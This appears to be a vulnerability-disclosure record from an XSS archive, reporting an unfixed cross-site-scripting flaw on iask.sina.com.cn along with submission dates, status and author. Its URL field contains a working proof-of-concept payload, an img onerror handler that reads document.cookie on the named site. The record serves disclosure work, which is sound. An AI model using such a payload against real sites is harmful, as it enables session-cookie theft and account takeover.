Security researcher Blast, has submitted on 05/10/2009 a cross-site-scripting (XSS) vulnerability affecting iask.sina.com.cn, which at the time of submission ranked 16 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 05/10/2009 |
Date published: 22/05/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: Blast |
Domain: iask.sina.com.cn |
Category: XSS |
Pagerank: 16 |
URL: http://iask.sina.com.cn/?k=<img%20onload=\"blast><img%20src=/%20onerror=javascript:alert(document.co okie)> |
Click here to view the mirror
|
|
|